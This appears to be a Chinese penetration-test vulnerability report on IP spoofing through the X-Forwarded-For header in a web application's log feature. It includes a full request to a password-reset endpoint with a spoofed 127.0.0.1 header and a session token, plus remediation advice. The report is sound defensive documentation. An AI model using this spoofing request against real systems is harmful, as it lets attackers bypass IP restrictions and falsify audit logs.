漏洞名称:存在IP地址伪造漏洞
漏洞等级:中危
关联bug:
漏洞描述:
应用系统存在IP地址伪造漏洞,攻击者可通过修改HTTP请求包伪造IP地址绕过IP地址限制,访问或执行系统相关功能。
漏洞功能点:
账户设置—系统日志
漏洞地址:
/
测试身份:
数据包:
DPOST /yuser-server/managers/testtest/resetPassword HTTP/1.1
Host: 10.200.1.145
Content-Length: 407
Accept: application/json, text/plain, */*
language: zh_CN
appid: ymall
platform: ADMIN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68
token: 579b137de27649dba7bc03fdeccedff5
Content-Type: application/json
Origin: http://10.200.1.145
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
X-Forwarded-For:127.0.0.1
Connection: close
{"accountType":"STANDARD","userId":"fffb11418abe4929aa3838a75828ff54","username":"testtest","deptName":null,"jobTitle":null,"mobile":null,"pricePermission":"Phone","lastLoginTime":null,"lockVersion":1,"roleId":"yl0005","roleName":"销售","name":"testtest","activeStatus":0,"email":"chenxd@yealink.com","menuList":null,"partnerList":null,"notifyConfigs":[],"managerAccountId":null,"managerAccountName":null}}
漏洞流程:
1、随便一个会记录日志的操作处,这里以重置密码为例,通过XFF属性头伪造IP地址为127.0.0.1
2、查看日志管理可以看到伪造的IP地址
修复方案:
1.直接对外提供服务的web应用,应通过REMOTE ADDRESS获取IP。
2.对于使用了nginx反向代理的web应用,正确配置应该是在最靠近用户端的代码服务器上强制设定X-Forwarded-For的值为REMOTE ADDRESS。